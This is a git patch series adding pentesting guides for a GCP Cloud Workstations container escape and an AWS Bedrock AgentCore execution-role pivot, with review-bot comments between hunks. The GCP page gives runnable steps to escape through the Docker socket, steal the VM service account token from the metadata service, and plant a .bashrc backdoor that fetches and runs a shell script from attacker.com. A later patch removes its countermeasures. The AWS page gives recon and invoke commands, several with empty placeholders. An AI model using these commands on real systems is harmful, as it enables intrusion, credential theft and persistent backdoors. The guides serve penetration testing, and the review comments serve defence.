From 4a16d25bfe51a53a06db0bf77699346eb0ef1efd Mon Sep 17 00:00:00 2001 From: Ben <93559326+AI-redteam@users.noreply.github.com> Date: Mon, 9 Feb 2026 16:08:37 -0600 Subject: [PATCH 1/7] Add GCP Cloud Workstations privesc guide Add a new guide documenting privilege escalation paths for GCP Cloud Workstations. Covers Docker-in-Docker container breakout via /var/run/docker.sock, step-by-step escape to the host VM, stealing the VM service account token from IMDS, persistence by backdooring the host home, network pivot techniques, and recommended countermeasures. Includes reference to an automation script and training banners. --- .../gcp-cloud-workstations-privesc.md | 124 ++++++++++++++++++ 1 file changed, 124 insertions(+) create mode 100644 src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md new file mode 100644 index 000000000..51923872d --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md 
@@ -0,0 +1,124 @@ +# GCP - Cloud Workstations Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Cloud Workstations + +For more information about Cloud Workstations check: + +{{#ref}} +../gcp-services/gcp-cloud-workstations-enum.md +{{#endref}} + +### Container Breakout via Docker Socket (Container -> VM -> Project) + +The primary privilege escalation path in Cloud Workstations stems from the requirement to support **Docker-in-Docker (DinD)** workflows for developers. When the workstation configuration mounts the Docker socket or allows privileged containers (a common configuration), an attacker inside the workstation container can escape to the underlying Compute Engine VM and steal its service account token. + +**Prerequisites:** +- Access to a Cloud Workstation terminal (via SSH, compromised session, or stolen credentials) +- The workstation configuration must mount `/var/run/docker.sock` or enable privileged containers + +**Architecture context:** The workstation is a container (Layer 3) running on a Docker/Containerd runtime (Layer 2) on a GCE VM (Layer 1). The Docker socket gives direct access to the host's container runtime. + +> [!NOTE] +> The tool [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) automates the full container escape and drops you into a root shell on the host VM. + +
+ +Step 1: Check for Docker socket + +```bash +# Verify the Docker socket is available +ls -l /var/run/docker.sock +# Expected output: srw-rw---- 1 root docker 0 ... +``` + +
+ +
+ +Step 2: Escape to the host VM filesystem + +We launch a privileged container, mounting the host's root directory to `/mnt/host`. We also share the host's network and PID namespace to maximize visibility. + +```bash +# Spawn a privileged container mounting the host's root filesystem +docker run -it --rm --privileged --net=host --pid=host \ + -v /:/mnt/host \ + alpine sh + +# Inside the new container, chroot into the host +chroot /mnt/host /bin/bash +``` + +You now have a **root shell on the underlying Compute Engine VM** (Layer 1). + +
+ +
+ +Step 3: Steal the VM service account token from IMDS + +```bash +# From the host VM, query the Instance Metadata Service +curl -s -H "Metadata-Flavor: Google" \ + http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token + +# Check which service account is attached +curl -s -H "Metadata-Flavor: Google" \ + http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/email + +# Check scopes (CRITICAL STEP) +curl -s -H "Metadata-Flavor: Google" \ + http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes +``` + +
+ +> [!CAUTION] +> **Check the Scopes!** +> Even if the attached Service Account is **Editor**, the VM might be restricted by access scopes. +> If you see `https://www.googleapis.com/auth/cloud-platform`, you have full access. +> If you only see `logging.write` and `monitoring.write`, you are limited to the **Network Pivot** and **Persistence** vectors below. + +
+ +Step 4: Achieve Persistence (Backdoor the User) + +Cloud Workstations mount a persistent disk to `/home/user`. Because the container user (usually `user`, UID 1000) matches the host user (UID 1000), you can write to the host's home directory. This allows you to backdoor the environment even if the workstation container is rebuilt. + +```bash +# Check if you can write to the host's persistent home +ls -la /mnt/host/home/user/ + +# Drop a backdoor that executes next time the developer logs in +# Note: Do this from the container escape context +echo "curl http://attacker.com/shell | bash" >> /mnt/host/home/user/.bashrc +``` + +
+ +
+ +Step 5: Network Pivot (Internal VPC Access) + +Since you share the host network namespace (`--net=host`), you are now a trusted node on the VPC. You can scan for internal services that allow access based on IP whitelisting. + +```bash +# Install scanning tools on the host (if internet access allows) +apk add nmap + +# Scan the internal VPC subnet +nmap -sS -p 80,443,22 10.0.0.0/8 +``` + +
+ +**Countermeasures:** + +* Disable "Running as root" in the Workstation Configuration +* Do not mount `/var/run/docker.sock` — use remote builders (e.g., Cloud Build) instead +* Assign a **custom service account** with minimal permissions to workstation configurations (e.g., `roles/source.reader`, `roles/artifactregistry.reader`) +* Place the workstation project inside a **VPC Service Controls** perimeter + +{{#include ../../../banners/hacktricks-training.md}} From 6b1b2329c24a2107842d20f344a66653bb537849 Mon Sep 17 00:00:00 2001 From: Ben <93559326+AI-redteam@users.noreply.github.com> Date: Mon, 9 Feb 2026 16:10:20 -0600 Subject: [PATCH 2/7] Clean up GCP Cloud Workstations privilege escalation doc Removed introductory content and references related to Cloud Workstations. --- .../gcp-cloud-workstations-privesc.md | 9 --------- 1 file changed, 9 deletions(-) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md index 51923872d..ec5a353a3 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md @@ -1,14 +1,5 @@ # GCP - Cloud Workstations Privesc -{{#include ../../../banners/hacktricks-training.md}} - -## Cloud Workstations - -For more information about Cloud Workstations check: - -{{#ref}} -../gcp-services/gcp-cloud-workstations-enum.md -{{#endref}} ### Container Breakout via Docker Socket (Container -> VM -> Project) From 0be98dc154a514f95e8f01ad5a1cc5d691c08716 Mon Sep 17 00:00:00 2001 
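Review bot: Step 5 cannot run in the context Step 2 leaves you in: after `chroot /mnt/host /bin/bash` you are inside the host VM's root filesystem, and `apk add nmap` is the package manager of the `alpine` container launched in Step 2, not of the host, so the "Install scanning tools on the host" command fails as written; the step should state which context it assumes. Step 1 is also weaker than the prerequisite it is meant to check: `ls -l /var/run/docker.sock` only proves the socket exists, while the `docker run` in Step 2 needs write access to it (root, or membership of the `docker` group shown in the `srw-rw---- 1 root docker` mode), which is exactly why the "Disable Running as root" countermeasure closes this path; the prerequisites should say so. Two smaller points: `--pid=host` is justified as "maximize visibility" but nothing later in the guide uses the host PID namespace, and the Step 4 example uses `attacker.com`, a real registered domain, where a reserved name such as `attacker.example` is the usual convention for this repo's examples.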
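Review bot: this hunk removes the `{{#ref}} ../gcp-services/gcp-cloud-workstations-enum.md {{#endref}}` block along with the intro, which drops the only cross-link from this privesc page to the service's enumeration page; the "For more information about Cloud Workstations check:" pointer is the pattern the other pages in this tree use, so keep the ref (or explain in the commit message why it is removed) and drop only the duplicated intro text.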
From: Ben <93559326+AI-redteam@users.noreply.github.com> Date: Mon, 9 Feb 2026 16:12:22 -0600 Subject: [PATCH 3/7] Remove hacktricks-training banner from documentation Removed the inclusion of hacktricks-training banner from the GCP privilege escalation documentation. --- .../gcp-privilege-escalation/gcp-cloud-workstations-privesc.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md index ec5a353a3..a0019a234 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md @@ -112,4 +112,4 @@ nmap -sS -p 80,443,22 10.0.0.0/8 * Assign a **custom service account** with minimal permissions to workstation configurations (e.g., `roles/source.reader`, `roles/artifactregistry.reader`) * Place the workstation project inside a **VPC Service Controls** perimeter -{{#include ../../../banners/hacktricks-training.md}} + From 2bb129291247eee3f6f619313fe6b2fb1a622e89 Mon Sep 17 00:00:00 2001 From: Ben <93559326+AI-redteam@users.noreply.github.com> Date: Mon, 9 Feb 2026 16:16:44 -0600 Subject: [PATCH 4/7] Remove countermeasures from GCP privilege escalation doc Removed countermeasures section from GCP privilege escalation documentation. --- .../gcp-cloud-workstations-privesc.md | 6 ------ 1 file changed, 6 deletions(-) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md index a0019a234..57cd6bc39 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md 
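Review bot: replacing `{{#include ../../../banners/hacktricks-training.md}}` with an empty `+` line leaves a trailing blank line at the end of the file and, more importantly, makes this page inconsistent with the rest of the series: the AWS page added in PATCH 7/7 keeps the banner include at both top and bottom, so the GCP page should too. If the banner is genuinely unwanted here, remove the empty line rather than adding it, and apply the same decision to both pages.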
@@ -105,11 +105,5 @@ nmap -sS -p 80,443,22 10.0.0.0/8 -**Countermeasures:** - -* Disable "Running as root" in the Workstation Configuration -* Do not mount `/var/run/docker.sock` — use remote builders (e.g., Cloud Build) instead -* Assign a **custom service account** with minimal permissions to workstation configurations (e.g., `roles/source.reader`, `roles/artifactregistry.reader`) -* Place the workstation project inside a **VPC Service Controls** perimeter From 70738d211e8ef9a1425394d7bd579ba4e7dc9cd2 Mon Sep 17 00:00:00 2001 From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com> Date: Thu, 12 Feb 2026 00:06:33 +0100 Subject: [PATCH 5/7] Revise AWS Bedrock AgentCore Code Interpreter documentation Updated the AWS Bedrock AgentCore documentation to clarify the Code Interpreter Role Pivot technique, including details on preconditions, required IAM actions, exploitation flow, and mitigation strategies. --- .../aws-bedrock-agentcore-privesc.md | 88 +++++++++++++++++++ 1 file changed, 88 insertions(+) create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md new file mode 100644 index 000000000..3f523b975 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md 
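Review bot: deleting the whole **Countermeasures** block removes the only defender-facing content on the GCP page (disable "Running as root", do not mount `/var/run/docker.sock`, attach a minimal custom service account, place the project in a VPC Service Controls perimeter), and each of those items maps directly onto a step of the attack path above it (root requirement for the socket, the socket itself, the IMDS token, the network pivot). The AWS page in PATCH 7/7 keeps a "Mitigations / Hardening" section, so the series ends up inconsistent; either keep this list here or move it to the enumeration page referenced by the original version, and say which in the commit message.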
@@ -0,0 +1,88 @@ +# AWS Bedrock AgentCore - Code Interpreter Role Pivot + +## Service + +**Amazon Bedrock AgentCore** + +## Technique Name + +**Code Interpreter Role Pivot** (Privilege escalation/lateral movement via over-privileged `executionRoleArn`) + +## Why this Matters + +Amazon Bedrock AgentCore introduced a "Code Interpreter" feature in mid-2025 that acts as a managed compute surface. It executes code within a Firecracker MicroVM-isolated environment. The critical security hook is the **`executionRoleArn`**: this is the IAM identity the interpreter uses to interact with other AWS services. + +When a developer grants this service-linked role excessive permissions (e.g., `s3:*`, `secretsmanager:GetSecretValue`), any user with the ability to invoke the interpreter can effectively "hijack" those permissions to move laterally or escalate privileges within the account. + + +## Preconditions (The Misconfiguration) + +1. **Over-privileged Execution Role:** An AgentCore Code Interpreter is configured with a role that has access to sensitive data or administrative APIs. +2. **Broad Invocation Access:** A low-privileged IAM principal is granted permission to start or interact with these sessions. +3. **Governance Failure:** The environment is treated as "AI experimental tooling" rather than "Managed Compute," bypassing standard Least Privilege reviews. + + +## Required IAM Actions + +To execute this pivot, an attacker needs one or more of the following `bedrock-agentcore` actions: + +* `bedrock-agentcore:StartCodeInterpreterSession` +* `bedrock-agentcore:InvokeCodeInterpreter` +* `bedrock-agentcore:CreateCodeInterpreter` (Allows creating a session with a pre-existing role) + +> **Note on `iam:PassRole`:** In current AWS Service Authorization References, `CreateCodeInterpreter` does not explicitly list `iam:PassRole` as a dependency in the same way `CreateGateway` does. 
This creates a potential "PassRole-less" role selection edge case that should be validated in target environments. + + +## Exploitation Flow + +### 1. Reconnaissance + +Identify existing interpreters and their associated execution roles. + +```bash +aws bedrock-agentcore-control list-code-interpreters +aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id + +``` + +### 2. Session Initiation + +Start a session to gain access to the compute environment. + +```bash +aws bedrock-agentcore start-code-interpreter-session --code-interpreter-id + +``` + +### 3. Lateral Movement / Exfiltration + +Invoke the interpreter to execute Python code that uses the `executionRoleArn` credentials to access other services. + +```python +import boto3 +# The interpreter uses the executionRoleArn automatically +s3 = boto3.client('s3') +print(s3.list_buckets()) + +``` + + +## Mitigation & Detection + +### **Prevention** + +* **Apply Permission Boundaries:** Attach a boundary to the `executionRoleArn` to ensure it cannot perform IAM mutations or sensitive data deletions, regardless of its primary policy. +* **Restrict Invocation:** Limit `StartCodeInterpreterSession` and `InvokeCodeInterpreter` to specific, authorized admin principals. +* **Identity Scoping:** Use the `bedrock-agentcore:sessionId` and `bedrock-agentcore:actorId` condition keys to ensure sessions are isolated to specific users. + +### **Detection** + +* **CloudTrail Monitoring:** Monitor for `StartCodeInterpreterSession` events from unexpected IPs or principals. +* **Credential Usage:** Alert on the use of AgentCore execution role credentials (detectable via the `UserAgent` or `PrincipalId` in CloudTrail) to access S3 buckets or Secrets Manager outside of normal AI operations. 
+ + +## References + +* [AWS CLI Reference: create-code-interpreter](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html) +* [AWS Service Authorization: Bedrock AgentCore](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonbedrockagentcore.html) +* [AWS CLI: start-code-interpreter-session](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) From 9f57fc71197be234430324f5dc35db435c641e07 Mon Sep 17 00:00:00 2001 From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com> Date: Thu, 12 Feb 2026 11:04:17 +0100 Subject: [PATCH 6/7] Rename src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md --- .../README.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename src/pentesting-cloud/aws-security/aws-privilege-escalation/{src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md => aws-bedrock-agentcore-privesc/README.md} (100%) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md similarity index 100% rename from src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md From 45573491412c93664bb78a52b2dda41ad5bc670e Mon Sep 17 00:00:00 2001 
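Review bot: the new file lands at `src/pentesting-cloud/aws-security/aws-privilege-escalation/src/pentesting-cloud/aws-security /aws-bedrock-agentcore-privesc.md`, a doubled directory tree with a space inside a directory name; PATCH 6/7 exists only to move it, so the two should be squashed. Content problems that PATCH 7/7 partly addresses and that should not be left in the history as a standalone version: `executionRoleArn` is described as a "service-linked role", but it is a customer-created IAM role supplied at `create-code-interpreter` time, not an AWS service-linked role; `start-code-interpreter-session --code-interpreter-id` uses the wrong parameter name (the later version uses `--code-interpreter-identifier`); the `--code-interpreter-id` arguments carry no value or placeholder at all; the Python snippet shows code meant to run inside the interpreter but not how it is submitted (no `InvokeCodeInterpreter` call), which is the step the technique hinges on. The `iam:PassRole` note is explicitly speculative ("should be validated in target environments") and the "Identity Scoping" bullet names the condition keys `bedrock-agentcore:sessionId` and `bedrock-agentcore:actorId` without a reference; both should be checked against the Service Authorization Reference linked at the bottom and either confirmed or removed.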
From: Oussama Ait Manssour <67986338+AMOussama@users.noreply.github.com> Date: Thu, 12 Feb 2026 18:35:30 +0100 Subject: [PATCH 7/7] docs(aws): add AgentCore Code Interpreter role pivot privesc --- .../aws-bedrock-agentcore-privesc/README.md | 88 ------------- .../aws-bedrock-privesc/README.md | 122 ++++++++++++++++++ 2 files changed, 122 insertions(+), 88 deletions(-) delete mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md create mode 100644 src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md deleted file mode 100644 index 3f523b975..000000000 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-agentcore-privesc/README.md +++ /dev/null 
@@ -1,88 +0,0 @@ -# AWS Bedrock AgentCore - Code Interpreter Role Pivot - -## Service - -**Amazon Bedrock AgentCore** - -## Technique Name - -**Code Interpreter Role Pivot** (Privilege escalation/lateral movement via over-privileged `executionRoleArn`) - -## Why this Matters - -Amazon Bedrock AgentCore introduced a "Code Interpreter" feature in mid-2025 that acts as a managed compute surface. It executes code within a Firecracker MicroVM-isolated environment. The critical security hook is the **`executionRoleArn`**: this is the IAM identity the interpreter uses to interact with other AWS services. - -When a developer grants this service-linked role excessive permissions (e.g., `s3:*`, `secretsmanager:GetSecretValue`), any user with the ability to invoke the interpreter can effectively "hijack" those permissions to move laterally or escalate privileges within the account. - - -## Preconditions (The Misconfiguration) - -1. **Over-privileged Execution Role:** An AgentCore Code Interpreter is configured with a role that has access to sensitive data or administrative APIs. -2. **Broad Invocation Access:** A low-privileged IAM principal is granted permission to start or interact with these sessions. -3. **Governance Failure:** The environment is treated as "AI experimental tooling" rather than "Managed Compute," bypassing standard Least Privilege reviews. - - -## Required IAM Actions - -To execute this pivot, an attacker needs one or more of the following `bedrock-agentcore` actions: - -* `bedrock-agentcore:StartCodeInterpreterSession` -* `bedrock-agentcore:InvokeCodeInterpreter` -* `bedrock-agentcore:CreateCodeInterpreter` (Allows creating a session with a pre-existing role) - -> **Note on `iam:PassRole`:** In current AWS Service Authorization References, `CreateCodeInterpreter` does not explicitly list `iam:PassRole` as a dependency in the same way `CreateGateway` does. 
This creates a potential "PassRole-less" role selection edge case that should be validated in target environments. - - -## Exploitation Flow - -### 1. Reconnaissance - -Identify existing interpreters and their associated execution roles. - -```bash -aws bedrock-agentcore-control list-code-interpreters -aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id - -``` - -### 2. Session Initiation - -Start a session to gain access to the compute environment. - -```bash -aws bedrock-agentcore start-code-interpreter-session --code-interpreter-id - -``` - -### 3. Lateral Movement / Exfiltration - -Invoke the interpreter to execute Python code that uses the `executionRoleArn` credentials to access other services. - -```python -import boto3 -# The interpreter uses the executionRoleArn automatically -s3 = boto3.client('s3') -print(s3.list_buckets()) - -``` - - -## Mitigation & Detection - -### **Prevention** - -* **Apply Permission Boundaries:** Attach a boundary to the `executionRoleArn` to ensure it cannot perform IAM mutations or sensitive data deletions, regardless of its primary policy. -* **Restrict Invocation:** Limit `StartCodeInterpreterSession` and `InvokeCodeInterpreter` to specific, authorized admin principals. -* **Identity Scoping:** Use the `bedrock-agentcore:sessionId` and `bedrock-agentcore:actorId` condition keys to ensure sessions are isolated to specific users. - -### **Detection** - -* **CloudTrail Monitoring:** Monitor for `StartCodeInterpreterSession` events from unexpected IPs or principals. -* **Credential Usage:** Alert on the use of AgentCore execution role credentials (detectable via the `UserAgent` or `PrincipalId` in CloudTrail) to access S3 buckets or Secrets Manager outside of normal AI operations. 
- - -## References - -* [AWS CLI Reference: create-code-interpreter](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html) -* [AWS Service Authorization: Bedrock AgentCore](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonbedrockagentcore.html) -* [AWS CLI: start-code-interpreter-session](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md new file mode 100644 index 000000000..017d1323b --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-bedrock-privesc/README.md 
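Review bot: this deletion plus the new-file hunk that follows is effectively a move of the page to `aws-bedrock-privesc/README.md` with a rewrite, but the commit message ("docs(aws): add AgentCore Code Interpreter role pivot privesc") does not say that it supersedes the file added in PATCH 5/7 and renamed in PATCH 6/7. Either squash patches 5 to 7 into one "add" commit, or state the replacement in the message so the series history is readable.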
@@ -0,0 +1,122 @@ +# AWS - Bedrock PrivEsc + +{{#include ../../../../banners/hacktricks-training.md}} + +## Amazon Bedrock AgentCore + +### `bedrock-agentcore:StartCodeInterpreterSession` + `bedrock-agentcore:InvokeCodeInterpreter` - Code Interpreter Execution-Role Pivot + +AgentCore Code Interpreter is a managed execution environment. **Custom Code Interpreters** can be configured with an **`executionRoleArn`** that “provides permissions for the code interpreter to access AWS services”. + +If a **lower-privileged IAM principal** can **start + invoke** a Code Interpreter session that is configured with a **more privileged execution role**, the caller can effectively **pivot into the execution role’s permissions** (lateral movement / privilege escalation depending on role scope). + +> [!NOTE] +> This is typically a **misconfiguration / excessive permissions** issue (granting wide permissions to the interpreter execution role and/or granting broad invoke access). +> AWS explicitly warns to avoid privilege escalation by ensuring execution roles have **equal or fewer** privileges than identities allowed to invoke. + +#### Preconditions (common misconfiguration) + +- A **custom code interpreter** exists with an over-privileged **execution role** (ex: access to sensitive S3/Secrets/SSM or IAM-admin-like capabilities). +- A user (developer/auditor/CI identity) has permissions to: + - start sessions: `bedrock-agentcore:StartCodeInterpreterSession` + - invoke tools: `bedrock-agentcore:InvokeCodeInterpreter` +- (Optional) The user can also create interpreters: `bedrock-agentcore:CreateCodeInterpreter` (lets them create a new interpreter configured with an execution role, depending on org guardrails). 
+ +#### Recon (identify custom interpreters and execution role usage) + +List interpreters (control-plane) and inspect their configuration: + +```bash +aws bedrock-agentcore-control list-code-interpreters +aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id +```` + +> The create-code-interpreter command supports `--execution-role-arn` which defines what AWS permissions the interpreter will have. + +#### Step 1 - Start a session (this returns a `sessionId`, not an interactive shell) + +```bash +SESSION_ID=$( + aws bedrock-agentcore start-code-interpreter-session \ + --code-interpreter-identifier \ + --name "arte-oussama" \ + --query sessionId \ + --output text +) + +echo "SessionId: $SESSION_ID" +``` + +#### Step 2 - Invoke code execution (Boto3 or signed HTTPS) + +There is **no interactive python shell** from `start-code-interpreter-session`. Execution happens via **InvokeCodeInterpreter**. + +**Option A - Boto3 example (execute Python + verify identity):** + +```python +import boto3 + +client = boto3.client("bedrock-agentcore", region_name="") + +# Execute python inside the Code Interpreter session +resp = client.invoke_code_interpreter( + codeInterpreterIdentifier="", + sessionId="", + name="executeCode", + arguments={ + "language": "python", + "code": "import boto3; print(boto3.client('sts').get_caller_identity())" + } +) + +# Response is streamed; print events for visibility +for event in resp.get("stream", []): + print(event) +``` + +If the interpreter is configured with an execution role, the `sts:GetCallerIdentity()` output should reflect that role’s identity (not the low-priv caller), demonstrating the pivot. 
+ +**Option B - Signed HTTPS call (awscurl):** + +```bash +awscurl -X POST \ + "https://bedrock-agentcore..amazonaws.com/code-interpreters//tools/invoke" \ + -H "Content-Type: application/json" \ + -H "Accept: application/json" \ + -H "x-amzn-code-interpreter-session-id: " \ + --service bedrock-agentcore \ + --region \ + -d '{ + "name": "executeCode", + "arguments": { + "language": "python", + "code": "print(\"Hello from AgentCore\")" + } + }' +``` + +#### Impact + +* **Lateral movement** into whatever AWS access the interpreter execution role has. +* **Privilege escalation** if the interpreter execution role is more privileged than the caller. +* Harder detection if CloudTrail data events for interpreter invocations are not enabled (invocations may not be logged by default, depending on configuration). + +#### Mitigations / Hardening + +* **Least privilege** on the interpreter `executionRoleArn` (treat it like Lambda execution roles / CI roles). +* **Restrict who can invoke** (`bedrock-agentcore:InvokeCodeInterpreter`) and who can start sessions. +* Use **SCPs** to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary). +* Enable appropriate **CloudTrail data events** for AgentCore where applicable; alert on unexpected invocations and session creation. 
+ +## References + +- [Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)](https://sonraisecurity.com/blog/aws-agentcore-privilege-escalation-bedrock-scp-fix/) +- [Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)](https://sonraisecurity.com/blog/sandboxed-to-compromised-new-research-exposes-credential-exfiltration-paths-in-aws-code-interpreters/) +- [AWS CLI: create-code-interpreter (`--execution-role-arn`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore-control/create-code-interpreter.html) +- [AWS CLI: start-code-interpreter-session (returns `sessionId`)](https://docs.aws.amazon.com/cli/latest/reference/bedrock-agentcore/start-code-interpreter-session.html) +- [AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/code-interpreter-api-reference-examples.html) +- [AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)](https://docs.aws.amazon.com/bedrock-agentcore/latest/devguide/security-credentials-management.html) + + +{{#include ../../../../banners/hacktricks-training.md}} +
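Review bot: several values in this file are empty where a placeholder was clearly intended and the commands will not run as shown: `--code-interpreter-identifier \` has no argument, `region_name=""`, `codeInterpreterIdentifier=""` and `sessionId=""` are empty strings, `--region \` has no value, and the awscurl URL reads `https://bedrock-agentcore..amazonaws.com/code-interpreters//tools/invoke` (region and interpreter id missing). Angle-bracket placeholders do not survive markdown rendering; use forms that do, for example `$REGION` and `$INTERPRETER_ID` in the shell blocks and `"<REGION>"` inside quoted strings. The recon block closes its fence with four backticks (````) after opening with three; it renders but should be three for consistency with the rest of the page. `--name "arte-oussama"` should be a neutral placeholder rather than a personal tag, and `sts:GetCallerIdentity()` mixes the IAM action name with call syntax; write `sts:GetCallerIdentity` (the action) or `get_caller_identity()` (the boto3 call) as the sentence needs. In the Impact section, "invocations may not be logged by default, depending on configuration" is too vague to act on; the Mitigations bullet on CloudTrail data events should name the event source and say which of `StartCodeInterpreterSession` and `InvokeCodeInterpreter` are management versus data events, with a link to the relevant AWS doc. Finally, the preconditions list `bedrock-agentcore:CreateCodeInterpreter` as a way to obtain an interpreter bound to a chosen execution role, but the Mitigations only restrict starting and invoking sessions; add restricting `CreateCodeInterpreter` and `iam:PassRole` on execution roles to the hardening list, since that is what stops a principal from minting a new over-privileged interpreter.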